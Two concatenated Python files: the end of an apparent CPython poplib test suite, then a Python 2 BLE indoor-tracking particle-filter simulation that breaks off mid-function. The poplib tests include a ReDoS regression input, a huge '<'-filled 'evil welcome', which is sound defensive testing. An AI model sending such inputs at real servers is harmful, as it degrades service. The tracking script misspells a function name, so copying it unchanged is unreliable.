def assertOK(self, resp):
self.assertTrue(resp.startswith(b"+OK"))
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.start()
self.client = poplib.POP3(self.server.host, self.server.port,
timeout=test_support.LOOPBACK_TIMEOUT)
def tearDown(self):
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(),
b'+OK dummy pop3 server ready. <timestamp>')
def test_exceptions(self):
self.assertRaises(poplib.error_proto, self.client._shortcmd, 'echo -err')
def test_user(self):
self.assertOK(self.client.user('guido'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_pass_(self):
self.assertOK(self.client.pass_('python'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_stat(self):
self.assertEqual(self.client.stat(), (10, 100))
def test_list(self):
self.assertEqual(self.client.list()[1:],
([b'1 1', b'2 2', b'3 3', b'4 4', b'5 5'],
25))
self.assertTrue(self.client.list('1').endswith(b"OK 1 1"))
def test_retr(self):
expected = (b'+OK 116 bytes',
[b'From: postmaster@python.org', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy',
b'', b'line1', b'line2', b'line3'],
113)
foo = self.client.retr('foo')
self.assertEqual(foo, expected)
def test_too_long_lines(self):
self.assertRaises(poplib.error_proto, self.client._shortcmd,
'echo +%s' % ((poplib._MAXLINE + 10) * 'a'))
def test_dele(self):
self.assertOK(self.client.dele('foo'))
def test_noop(self):
self.assertOK(self.client.noop())
def test_rpop(self):
self.assertOK(self.client.rpop('foo'))
@hashlib_helper.requires_hashdigest('md5')
def test_apop_normal(self):
self.assertOK(self.client.apop('foo', 'dummypassword'))
@hashlib_helper.requires_hashdigest('md5')
def test_apop_REDOS(self):
# Replace welcome with very long evil welcome.
# NB The upper bound on welcome length is currently 2048.
# At this length, evil input makes each apop call take
# on the order of milliseconds instead of microseconds.
evil_welcome = b'+OK' + (b'<' * 1000000)
with test_support.swap_attr(self.client, 'welcome', evil_welcome):
# The evil welcome is invalid, so apop should throw.
self.assertRaises(poplib.error_proto, self.client.apop, 'a', 'kb')
def test_top(self):
expected = (b'+OK 116 bytes',
[b'From: postmaster@python.org', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy', b'',
b'line1', b'line2', b'line3'],
113)
self.assertEqual(self.client.top(1, 1), expected)
def test_uidl(self):
self.client.uidl()
self.client.uidl('foo')
def test_utf8_raises_if_unsupported(self):
self.server.handler.enable_UTF8 = False
self.assertRaises(poplib.error_proto, self.client.utf8)
def test_utf8(self):
self.server.handler.enable_UTF8 = True
expected = b'+OK I know RFC6856'
result = self.client.utf8()
self.assertEqual(result, expected)
def test_capa(self):
capa = self.client.capa()
self.assertTrue('IMPLEMENTATION' in capa.keys())
def test_quit(self):
resp = self.client.quit()
self.assertTrue(resp)
self.assertIsNone(self.client.sock)
self.assertIsNone(self.client.file)
@requires_ssl
def test_stls_capa(self):
capa = self.client.capa()
self.assertTrue('STLS' in capa.keys())
@requires_ssl
def test_stls(self):
expected = b'+OK Begin TLS negotiation'
resp = self.client.stls()
self.assertEqual(resp, expected)
@requires_ssl
def test_stls_context(self):
expected = b'+OK Begin TLS negotiation'
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(CAFILE)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.check_hostname, True)
with self.assertRaises(ssl.CertificateError):
resp = self.client.stls(context=ctx)
self.client = poplib.POP3("localhost", self.server.port,
timeout=test_support.LOOPBACK_TIMEOUT)
resp = self.client.stls(context=ctx)
self.assertEqual(resp, expected)
if SUPPORTS_SSL:
from test.test_ftplib import SSLConnection
class DummyPOP3_SSLHandler(SSLConnection, DummyPOP3Handler):
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.secure_connection()
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
self.tls_active = True
self.tls_starting = False
@requires_ssl
class TestPOP3_SSLClass(TestPOP3Class):
# repeat previous tests by using poplib.POP3_SSL
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.handler = DummyPOP3_SSLHandler
self.server.start()
self.client = poplib.POP3_SSL(self.server.host, self.server.port)
def test__all__(self):
self.assertIn('POP3_SSL', poplib.__all__)
def test_context(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, certfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE,
certfile=CERTFILE, context=ctx)
self.client.quit()
self.client = poplib.POP3_SSL(self.server.host, self.server.port,
context=ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.assertIs(self.client.sock.context, ctx)
self.assertTrue(self.client.noop().startswith(b'+OK'))
def test_stls(self):
self.assertRaises(poplib.error_proto, self.client.stls)
test_stls_context = test_stls
def test_stls_capa(self):
capa = self.client.capa()
self.assertFalse('STLS' in capa.keys())
@requires_ssl
class TestPOP3_TLSClass(TestPOP3Class):
# repeat previous tests by using poplib.POP3.stls()
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.start()
self.client = poplib.POP3(self.server.host, self.server.port,
timeout=test_support.LOOPBACK_TIMEOUT)
self.client.stls()
def tearDown(self):
if self.client.file is not None and self.client.sock is not None:
try:
self.client.quit()
except poplib.error_proto:
# happens in the test_too_long_lines case; the overlong
# response will be treated as response to QUIT and raise
# this exception
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
def test_stls(self):
self.assertRaises(poplib.error_proto, self.client.stls)
test_stls_context = test_stls
def test_stls_capa(self):
capa = self.client.capa()
self.assertFalse(b'STLS' in capa.keys())
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(60) # Safety net. Look issue 11812
self.port = socket_helper.bind_port(self.sock)
self.thread = threading.Thread(target=self.server, args=(self.evt, self.sock))
self.thread.daemon = True
self.thread.start()
self.evt.wait()
def tearDown(self):
self.thread.join()
# Explicitly clear the attribute to prevent dangling thread
self.thread = None
def server(self, evt, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
conn.send(b"+ Hola mundo\n")
conn.close()
except TimeoutError:
pass
finally:
serv.close()
def testTimeoutDefault(self):
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(test_support.LOOPBACK_TIMEOUT)
try:
pop = poplib.POP3(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(pop.sock.gettimeout(), test_support.LOOPBACK_TIMEOUT)
pop.close()
def testTimeoutNone(self):
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
pop = poplib.POP3(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(pop.sock.gettimeout())
pop.close()
def testTimeoutValue(self):
pop = poplib.POP3(HOST, self.port, timeout=test_support.LOOPBACK_TIMEOUT)
self.assertEqual(pop.sock.gettimeout(), test_support.LOOPBACK_TIMEOUT)
pop.close()
with self.assertRaises(ValueError):
poplib.POP3(HOST, self.port, timeout=0)
def test_main():
tests = [TestPOP3Class, TestTimeouts,
TestPOP3_SSLClass, TestPOP3_TLSClass]
thread_info = threading_helper.threading_setup()
try:
test_support.run_unittest(*tests)
finally:
threading_helper.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
case2.py
|
from __future__ import division
import numpy as np
import math # for math.ceil
import matplotlib.pyplot as plt
from numpy.linalg import norm
from numpy.random import uniform
from scipy.stats import multivariate_normal # for bivariate gaussian -> brownian motion ( normal with mu x(t-1), and variance sigma )
from filterpy.monte_carlo import systematic_resample, multinomial_resample , residual_resample, stratified_resample
from scipy.optimize import minimize
from scipy.optimize import fmin_tnc
from matplotlib.patches import Ellipse, Rectangle, Circle
import matplotlib.transforms as transforms
from matplotlib import animation
from matplotlib import collections
from numpy.random import seed
from multiprocessing import Process
from collections import deque as col_deque # for the sliding windows
import copy
#from matplotlib.font_manager import FontProperties
import time
from sklearn.cluster import KMeans
from shapely.geometry import LineString
from shapely.geometry import Point
from shapely.geometry import Polygon
#from shapely.geometry.point import Point
import shapely.affinity
import matplotlib.ticker as mticker
from scipy.interpolate import griddata
from scipy.interpolate import interp2d
import matplotlib.patches as mpatches
from matplotlib import rc
import os
rc('text', usetex=True)
import sys
if len(sys.argv)!=3:
print "run as 'python <script name> <seed no> <output file name>'"
exit(1)
# object of interest , all variables used for single object tracking will be used as a member variable
# and all the function will be used as a class function instead of global functions
sizeIncrementRatio=1000/762 # sizeIncrementRatio_small_over_large -> kagida basarken small haritalarin boyutu buyuk oldugundan daha cok resize ediliyor, bunu handle etmeliyiz.
TOTAL_MULTILATERATION_ACCURACY=0
TOTAL_MULTILATERATION_ITER=0
sensitivityOfResult=0.1
maxSignalError=0
numberOfBlocks=2
#blockWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 8
#blockLength=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 12
blockWidth=0.5 # 0.7 = 70cm for example
blockLength=2.5
pastCoeff=0.2
totalNumberOfPeople=1
MinWaitingForPerson=0 # min waiting time between each person
MaxWaitingForPerson=20
totalIterNo=6
NumberOfParticles=300
xdims=(0,5) # our office's coordinates
ydims=(0,3)
#xdims=(0,3)
#ydims=(0,2)
movingLimit=1.0
minUsefulSignal=-90
minSignalValue=-100
numberOfReceivers=3
strongSignalDistance=5
#movingTendency=np.array([0.5,0.2])
movingTendency=np.array([0.0,0.0])
prevMotionRepeatProb=0.75
numberOfRooms=0
#roomWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 8
#roomLength=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 6
roomWidth=2
roomLength=5
# roomPositions = [ [6.75,7] ]
OOIWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) /10 * sizeIncrementRatio# beacon representing the person is drawn as circle in the map(ellipse indeed, but looks like a circle due to adjustments)
OOIHeight=OOIWidth
particleWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) /400 * sizeIncrementRatio
particleHeight=particleWidth
# these blocking material positions will be added in main function
# make receivers in square shape
receiverWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) /30 * sizeIncrementRatio
receiverLength=receiverWidth
receiverPositions=[]
blockPositions=[]
roomPositions=[]
blockMaterials=[]
roomMaterials=[]
WallRoomRatio=0.125# 0/125: rooms have only 1/8 of them as the 2 walls that we intersect(so inner area is 14 wall width totaling 16 wall width area size)
# distance is already calculated for our RSSI before taking material things into account, so no need to think about empty area in the rooms
roomWallWidth=roomWidth * WallRoomRatio # express line witdht in terms of data points instead of axis
# since linewidth expand line width towards inside and outside both in equal amount(so roomWallWidth/2 distance check from rectangle boundary is enouhg for collision check)
materials=['concrete']
#materials = ['aluminum','iron', 'concrete', 'brick', 'glass'] # blockMaterials and roomMaterials elements are chosen from this list
materialColors = {'aluminum':'silver','iron':'black', 'concrete':'gray', 'brick':'red', 'glass':'aqua'} # https://matplotlib.org/users/colors.html
#material_SignalDisturbance_Coefficients={'aluminum':10.0, 'iron':9.0, 'concrete':8.0, 'brick':7.0, 'glass':3.0 } # signal attenuation per 1 meter in terms of dBm
material_SignalDisturbance_Coefficients={'aluminum':20.0, 'iron':18.0, 'concrete':16.0, 'brick':14.0, 'glass':6.0 } # signal attenuation per 1 meter in terms of dBm
smallestFigureSideInInch=6 # smallest side will be 6 inch
TX_Power=0
rssiAtOne=TX_Power-65
fingerPrintingBeaconPositions=np.array( [ [0.25,2.25], [5, 5 ], [12, 8 ], [11.5, 3 ] ] )
#fingerPrintingBeaconPositions=np.array( [ [0,0], [5, 5 ], [12, 8 ], [13.5,13 ] ] )
fingerPrintingSignalStrengthBeaconsToReceivers=np.array([ [ -92, -89, -88, -87 ], [ -95, -94, -87, -85 ], [ -88, -91, -78, -79 ] ]) # 4 Beacon to each of the 3 receivers
InterpolatedMapForReceivers=None
interpolatedSignalStrenghForAllPositions_forEachReceiver={} # make it a dictionary where the key is 2d position
useFingerPrinting=True # use fingerprinting instead of multi-laterate , choose the 1st nearest valued position
safetyOffset = 10**-10
OverallError=0
numberOfNotFounds=0
#predefinedPos=np.array([ [0.1,0], [0.2,1], [0.22,1.7], [0.3,2.7], [1.5,2.6], [2,1.7], [2.5,0.2], [3.5,0.15] ])
predefinedPos=np.array([ [0.1,0], [0.2,1], [0.22,1.7], [0.3,2.7], [1.5,2.6], [2,1.7] ])
def main():
global receiverPositions, blockPositions, roomPositions, blockMaterials, roomMaterials, roomWallWidth
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
#print "processFunction"
seed(int(sys.argv[1]))
print "seed is: " + sys.argv[1]
receiverPositions=getReceiverPositionsToInstall(xdims,ydims,numberOfReceivers)
blockPositions=getBlockPositionsToInstall(xdims=xdims,ydims=ydims,numberOfBlocks=numberOfBlocks) # install blocks without overlapping
#roomPositions=getRoomPositionsToInstall(xdims=xdims,ydims=ydims,numberOfRooms=numberOfRooms,roomBoundary=roomWallWidth/2)
blockMaterials=np.random.choice(materials, numberOfBlocks)
roomMaterials=np.random.choice(materials, numberOfRooms)
AllProcesses=[]
#for i in range(totalNumberOfPeople):
AllProcesses.append(Process(target=processFunction,args=() ) )
for proc in AllProcesses:
proc.start()
sleepAmount=np.random.uniform(low=MinWaitingForPerson,high=MaxWaitingForPerson)
#print "sleepAmount is: " + str(sleepAmount)
time.sleep(sleepAmount)
def processFunction():
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
macID=generateRandomMACID()
while True:
initialPositionOfThePerson=np.random.uniform(low=[xmin,ymin], high=[xmax,ymax], size=(2))
isCollision=False
for blockPosition in blockPositions:
if checkEllipseRectangleIntersection(initialPositionOfThePerson,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength):
isCollision=True
break
if not isCollision:
for roomIndex, roomPosition in enumerate(roomPositions):
if checkEllipseRectangleIntersection(initialPositionOfThePerson,OOIWidth,OOIHeight,roomPosition,roomWidth,roomLength,boundaryForRect=roomWallWidth/2):
isCollision=True
break
if not isCollision:
break
currPerson = OOI(xdims,ydims,NumberOfParticles,receiverPositions,initialPositionOfThePerson)
iterNo=0
while iterNo < totalIterNo:
animate(iterNo, macID, currPerson, NumberOfParticles,xdims,ydims,maxSignalError,movingLimit,pastCoeff,
minUsefulSignal,minSignalValue,numberOfReceivers,sensitivityOfResult,
strongSignalDistance,movingTendency)
iterNo+=1
def checkIfCoordinateIsInMap(coords,width,height):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
return coords[0]-width/2 >= xmin and coords[0]+width/2 <= xmax and coords[1]-height/2 >= ymin and coords[1]+height/2 <= ymax
class OOI:
def __init__(self,xdims,ydims,NumberOfParticles,receiverPositions,initialPositionOfThePerson):
# INITIALIZATION STEP, distribute particles on the map
self.particles = create_uniform_particles(xdims,ydims , NumberOfParticles)
self.weights = np.ones(NumberOfParticles) / NumberOfParticles
#beacon_pos = np.array([0.0, 0.0])
#self.beacon_pos = np.array( [(xdims[1]-xdims[0])/4.0,(ydims[1]-ydims[0])/4.0] )
self.beacon_pos=initialPositionOfThePerson
self.prev_walkingNoise=None
self.x_prev = np.zeros((NumberOfParticles, 2)) # prev particles
self.x_pp = np.zeros((NumberOfParticles, 2)) # prev of prev particle
self.receiverPositions = receiverPositions
self.RSSIofReceivers=[] # what are the RSSI valus for this person on our receiver devices
self.UnprocessedRSSIofReceivers=[] # BLE fingerprinting needs the base value(ham deger) to compare its results with the received(but still weaking due to should be simualated since it is real)
self.distToReceivers=[]
self.prevCovMatrix=None
self.mu=None
self.max_weighted_particle=None
self.slidingWindows=[col_deque([]) for i in range(len(receiverPositions) ) ]
# circle rectangle detection yapmaliyim aslinda:
# http://jeffreythompson.org/collision-detection/circle-rect.php
#ensure person does not go out the map
# movingLimit is the max step lenght of the person, let's say 1 meter per time step for example
# movingTendency is the tendency for our the person to move in a direction
def move_beacon_in_map(self,xdims, ydims,movingLimit,movingTendency=np.array([0,0]),roomBoundary=0 ):
# hepsini dolassin bloklarin, hicbiri ile kesismiyorsa hareket etsin
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
xlow = np.maximum(xmin,self.beacon_pos[0]-movingLimit)-self.beacon_pos[0]
xhigh =np.minimum(xmax, self.beacon_pos[0]+movingLimit)-self.beacon_pos[0]
ylow = np.maximum(ymin,self.beacon_pos[1]-movingLimit)-self.beacon_pos[1]
yhigh =np.minimum(ymax, self.beacon_pos[1]+movingLimit)-self.beacon_pos[1]
while True:
walking_noise_x = np.random.uniform(low=xlow,high=xhigh) # human motion undeterminism
walking_noise_y = np.random.uniform(low=ylow,high=yhigh)
#walking_noise = np.zeros(particles.shape)
walkingNoise=np.array( (walking_noise_x,walking_noise_y)).T
#walkingNoise=np.random.uniform(-movingLimit,movingLimit,size=(2,))
if self.prev_walkingNoise is not None:
walkingChoices=[walkingNoise,self.prev_walkingNoise]
walkingNoise = np.copy(walkingChoices[ np.random.choice([0,1], p=(1-prevMotionRepeatProb,prevMotionRepeatProb)) ] ) # choose the prev motion with a higher probability
tmpBeaconPos=self.beacon_pos + walkingNoise + movingTendency
#print "beacon pos is: " + str(self.beacon_pos)
#print "walkingNoise is: " + str(walkingNoise)
isCollision=not checkIfCoordinateIsInMap(tmpBeaconPos, OOIWidth,OOIHeight)
if not isCollision:
for blockPosition in blockPositions:
#if checkCircleCollision_WithRectangle(tmpBeaconPos,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength):
if checkEllipseRectangleIntersection(tmpBeaconPos,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength) or \
findRectangleLineSegmentIntersectionPoints(self.beacon_pos,tmpBeaconPos,blockPosition,blockWidth,blockLength) is not None :
isCollision=True
break
if not isCollision:
for roomIndex, roomPosition in enumerate(roomPositions):
#if checkCircleCollision_WithRectangle(tmpBeaconPos,beaconRadius,roomPosition,roomWidth,roomLength):
if checkEllipseRectangleIntersection(tmpBeaconPos,OOIWidth,OOIHeight,roomPosition,roomWidth,roomLength,boundaryForRect=roomBoundary) or \
indRectangleLineSegmentIntersectionPoints(self.beacon_pos,tmpBeaconPos,roomPosition,roomWidth,roomLength) is not None :
isCollision=True
break
if not isCollision:
break
self.prev_walkingNoise=np.copy(walkingNoise)
self.beacon_pos = np.copy(tmpBeaconPos)
# use constant velocity model described in page 32
# yurumek icin mu 0.5 metre olur, std ise 0.2m falan.
# O zaman variance 0.04 m2 diyebiliriz
# p(x_t| x{t-1}), su sekilde hesaplanabilir, p(x_t) icin gaussian hesapla, sonra p(x_{t-1} icin hesapla p(x_t,x{t-1} = p(x_t| x{t-1}) * p(x_{t-1} demek) )
# 2 prob'un ayni anda bulunmasi demek yani bu
# 2 prob'un altta kalan alani, bu area'yi p(x_{t-1}'e bolersek sonucu buluruz) )) -> bu da page 32'deki formule tekabul ediyor(bolmek demek exp'lerin cikarilmasi demek)
# velocity icin ise x(t-1) ve x(t-2) verilmeli bunlar default'u None olacak, ve eger biri dahi None ise velocity hesaplanamayacagindan ilk oncelerde bunlar
# hesaba katilamdan prediction yapacagiz, yani brownian motion olmus olacak.
# 32'deki d'nin ne oldugunu tam anlayamadim, ben 1 kabul edecegim onu direkt olarak.
# x_prev = x(t-1)
# x_pp = prev of x_prev
def predict_BLE( self, no_of_noise_elements, movingLimit, pastCoeff, xdims, ydims, movingTendency=np.array([0,0]) ):
#rand_gaussian_noise=np.random.multivariate_normal(mu=mu,cov=sigma,size=no_of_noise_elements) # Draw random samples from a multivariate normal distribution
#rand_gaussian_noise = 0
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
# ALL PARTICLES SHOULD RESIDE IN THE MAP, CHECK FOR BEING INSIDE FOR EACH PARTICLE (MOVE THAT AMOUNT AT THE BORDERS AT MAX)
# min of x, should not be lower than map's xmin && max of x should not be larger than map's xmax
# meaning low should be max(xmin,particles[:,0]-xmin-movingLimit) && high = min(xmax, xmax-particles[:,0]+movingLimit)
xlow = np.maximum(xmin,self.particles[:,0]-movingLimit)-self.particles[:,0]
xhigh =np.minimum(xmax, self.particles[:,0]+movingLimit)-self.particles[:,0]
ylow = np.maximum(ymin,self.particles[:,1]-movingLimit)-self.particles[:,1]
yhigh =np.minimum(ymax, self.particles[:,1]+movingLimit)-self.particles[:,1]
walking_noise_x = np.random.uniform(low=xlow,high=xhigh,size=self.particles.shape[0]) # human motion undeterminism
walking_noise_y = np.random.uniform(low=ylow,high=yhigh,size=self.particles.shape[0])
##print "walking_noise_x is: " + str(walking_noise_x)
#walking_noise = np.zeros(particles.shape)
walking_noise_x=np.array(walking_noise_x)
walking_noise_y=np.array(walking_noise_y)
walking_noise=np.array( (walking_noise_x,walking_noise_y)).T
if np.count_nonzero(self.x_prev) != 0 and np.count_nonzero(self.x_pp) != 0:
past_velocity = self.x_prev - self.x_pp
change_in_pos = (1-pastCoeff) * walking_noise + pastCoeff * past_velocity # constant_velocity_motion
else:
change_in_pos = walking_noise
#particles +=
self.particles += change_in_pos + movingTendency
# Update the weight of the particles according to the measured beacon position found in the multilateration algorithm for the current time step
def update_weights(self):
distances = np.linalg.norm(self.particles - self.averaged_beacon_pos, axis=1)
self.weights *= np.sum(distances)/distances
# SET ALL WEIGHTS INTERSECTING WITH AN OBSTRUCTION TO ZERO (so that particles do not accumulate on obstructions)
for particleIndex, particle in enumerate(self.particles):
isCollision=False
for blockPosition in blockPositions:
#if checkCircleCollision_WithRectangle(tmpBeaconPos,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength):
if checkEllipseRectangleIntersection(particle,particleWidth,particleHeight,blockPosition,blockWidth,blockLength):
isCollision=True
break
if not isCollision:
for roomIndex,roomPosition in enumerate(roomPositions):
#if checkCircleCollision_WithRectangle(tmpBeaconPos,beaconRadius,roomPosition,roomWidth[roomIndex],roomLength[roomIndex]):
#print "room wall width is: " + str(roomWallWidth)
# use roomWallWidth/2, since linewidth expands toward outside and inside (for roomWallWidth, expands roomWallWidth/2 towards inside and roomWallWidth/2 towards outside)
if checkEllipseRectangleIntersection(particle,particleWidth,particleHeight,roomPosition,roomWidth[roomIndex],roomLength[roomIndex],boundaryForRect=roomWallWidth[roomIndex]/2):
isCollision=True
break
if isCollision:
self.weights[particleIndex]=0
self.weights += 10**(-300) # avoid round-off to zero
self.weights /= sum(self.weights) # normalize
# Resample N_eff
def resample_from_higher_weights(self,tmp_particles, tmp_weights):
#indices = multinomial_resample(weights)
#indices = residual_resample(weights)
#indices = stratified_resample(weights)
indices = systematic_resample(self.weights)
tmp_particles[:] = tmp_particles[indices]
tmp_weights[:] = tmp_weights[indices]
tmp_weights.fill(1.0 / len(tmp_weights))
# maxSignalError in dBm
# it should call checkLineSegmentCollision_WithRectange, to lower signal if receiver and beacon is not in "Line of Sight"
def calc_RSSIs_to_Receivers(self,minSignalValue,minUsefulSignal,maxSignalError):
self.RSSIofReceivers[:] = []
self.UnprocessedRSSIofReceivers[:] = []
receiverIndex=0
for receiverPosition in self.receiverPositions:
res_unprocessedRSSI = 0
if(maxSignalError > 0):
res_unprocessedRSSI=weakenedSignal( distance_to_RSSI( np.linalg.norm(receiverPosition-self.beacon_pos) ) , maxSignalError )
else:
##print "the norm is: " + str(np.linalg.norm(receiverPosition-self.beacon_pos ))
res_unprocessedRSSI=distance_to_RSSI( np.linalg.norm(receiverPosition-self.beacon_pos ) )
#return max(-100,unprocessedRSSI) # Generally signals lower than -100 are not that reliable
isCollision=False
# this is used to weaken the signal in case there was a block or room between the receiver and the beacon(this is real calculation)
# this simulates the signal before we catch it in real life.
weakeningAmount=0 # distance between the receiver and the beacon / 1 meter * ( how many dBm to reduce for 1 meter)
for blockIndex, blockPosition in enumerate(blockPositions):
receiverBeaconBlockIntersection=findRectangleLineSegmentIntersectionPoints(receiverPosition,self.beacon_pos,blockPosition,blockWidth,blockLength)
if receiverBeaconBlockIntersection is not None:
#print "receiverBeaconBlockIntersection" + str(receiverBeaconBlockIntersection)
isCollision=True
weakeningAmount+=np.linalg.norm(receiverBeaconBlockIntersection[0,:]-receiverBeaconBlockIntersection[1,:]) * material_SignalDisturbance_Coefficients[ blockMaterials[blockIndex] ] * np.random.uniform(0.5,1.5) # +- some noise olsun
# her engel icin noise eklemek, gercek hayat icin de uygun olacaktir
# aslinda burada duvarin material'i ile de hareket etmeliyim. Coefficient'lar 1m icin idi sonucta
# distance/1 * coefficient , yani distance(in meters) * coefficient olmali
for roomIndex, roomPosition in enumerate(roomPositions):
receiverBeaconRoomIntersection=findRectangleLineSegmentIntersectionPoints(receiverPosition,self.beacon_pos,roomPosition,roomWidth,roomLength)
if receiverBeaconRoomIntersection is not None:
#print "receiverBeaconRoomIntersection" + str(receiverBeaconRoomIntersection)
isCollision=True
weakeningAmount+=np.linalg.norm(receiverBeaconRoomIntersection[0,:]-receiverBeaconRoomIntersection[1,:]) * WallRoomRatio * material_SignalDisturbance_Coefficients[ roomMaterials[roomIndex] ] * np.random.uniform(0.5,1.5)
# * some coefficient(odada cok zayiflamasin), odadaki duvarlar kadar zayiflasa yeterli bu da odanin 8'de biri kadar falan olur(kestigimiz 2 duvari da dusunecek olursak)
strengtheningAmount=0 # (distance between the receiver and the mean of the particles) / 1 meter * ( how many dBm to reduce for 1 meter)
# the calculations below are not real. They are our prediction by looking at the mean value of the particles
# if the mean of the prev calculations and the beacons have a block or room in between, we better increase the signal
# this simulates after receiving the signal in real life (post processing of the signal)
isMeanReceiverCollision=False # this is used to strengthen the received signal in case there was a block in between previously
if self.mu is not None: #!= degildir kulanma cunku, array oldugu zaman burasi hata verir
for blockIndex, blockPosition in enumerate(blockPositions):
receiverMeanBlockIntersection = findRectangleLineSegmentIntersectionPoints(receiverPosition,self.mu,blockPosition,blockWidth,blockLength)
if receiverMeanBlockIntersection is not None:
#print "receiverMeanBlockIntersection" + str(receiverMeanBlockIntersection)
isMeanReceiverCollision=True
strengtheningAmount+=np.linalg.norm(receiverMeanBlockIntersection[0,:]-receiverMeanBlockIntersection[1,:]) * material_SignalDisturbance_Coefficients[ blockMaterials[blockIndex] ]
for roomIndex, roomPosition in enumerate(roomPositions):
receiverMeanRoomIntersection = findRectangleLineSegmentIntersectionPoints(receiverPosition,self.mu,roomPosition,roomWidth,roomLength)
if receiverMeanRoomIntersection is not None:
#print "receiverMeanRoomIntersection" + str(receiverMeanRoomIntersection)
isMeanReceiverCollision=True
strengtheningAmount+=np.linalg.norm(receiverMeanRoomIntersection[0,:]-receiverMeanRoomIntersection[1,:]) * WallRoomRatio * material_SignalDisturbance_Coefficients[ roomMaterials[roomIndex] ]
if isCollision:
##print "No Line Of Sight between receiver " + str(receiverPosition) + " and beacon " + str(self.beacon_pos)
#res_unprocessedRSSI=( weakenedSignal(res_unprocessedRSSI,maxSignalError) + res_unprocessedRSSI ) / 2.0 #weaken a bit, but not weaken upto max signal error
res_unprocessedRSSI-=weakeningAmount
else:
pass
##print "Direct Line Of Sight between receiver " + str(receiverPosition) + " and beacon " + str(self.beacon_pos)
res_processedRSSI=res_unprocessedRSSI
if isMeanReceiverCollision:
res_processedRSSI+=strengtheningAmount
##print "increased signal strength since there was a wall between the receiver and the beacon in the previous step according to our particle calculations"
# ONE MORE CHECK FOR SLIDING WINDOWS #
# each receiver should have a sliding window
# max slidingWindows size should be 7
slidingWindow = self.slidingWindows[receiverIndex]
while len(slidingWindow) >=7:
##print "prev size of the window is: " + str( len(self.slidingWindows) )
slidingWindow.popleft() # delete oldest element
##print "after size of the window is: " + str( len(self.slidingWindows) )
slidingWindow.append(res_processedRSSI) # appends at the right
##print "final size of the window is: " + str( len(self.slidingWindows) )
if self.filterAndCheckSignal(minUsefulSignal,receiverIndex) and res_processedRSSI > minSignalValue:
##print "filtering was successful"
self.RSSIofReceivers.append( res_processedRSSI )
self.UnprocessedRSSIofReceivers.append( res_unprocessedRSSI )
else:
##print "filtering was not successful"
self.RSSIofReceivers.append( None )
self.UnprocessedRSSIofReceivers.append( None )
receiverIndex+=1
def filterAndCheckSignal(self,minUsefulSignal,receiverIndex):
mean=0.0
sum=0.0
slidingWindow = self.slidingWindows[receiverIndex]
if len(slidingWindow) < 3:
return False
else:
noOutlierDeque=col_deque(sorted(slidingWindow) )
noOutlierDeque.popleft() # delete smallest
noOutlierDeque.pop() # delete greatest
for signalVal in noOutlierDeque:
sum+=signalVal
mean=sum/len(noOutlierDeque)
return mean >= minUsefulSignal
# if RSSI is lower than -90dBm , then omit this receiver ( assuming we use 0dBm signal powered beacons)
def setBeaconDistances_fromRSSIs(self,minUsefulSignal):
self.distToReceivers[:] = []
for RSSIofReceiver in self.RSSIofReceivers:
#print "rssi of receiver is: " + str(RSSIofReceiver)
if RSSIofReceiver is not None and \
RSSIofReceiver > minUsefulSignal:
self.distToReceivers.append( RSSI_to_distance( RSSIofReceiver ) + safetyOffset ) # add safetyOffset0 to avoid divide by zero in the custom_minimize function
else:
self.distToReceivers.append( None )
# NumberOfParticles for 4 RECEIVER
def multiLateration(self,xdims,ydims,sensitivityOfResult):
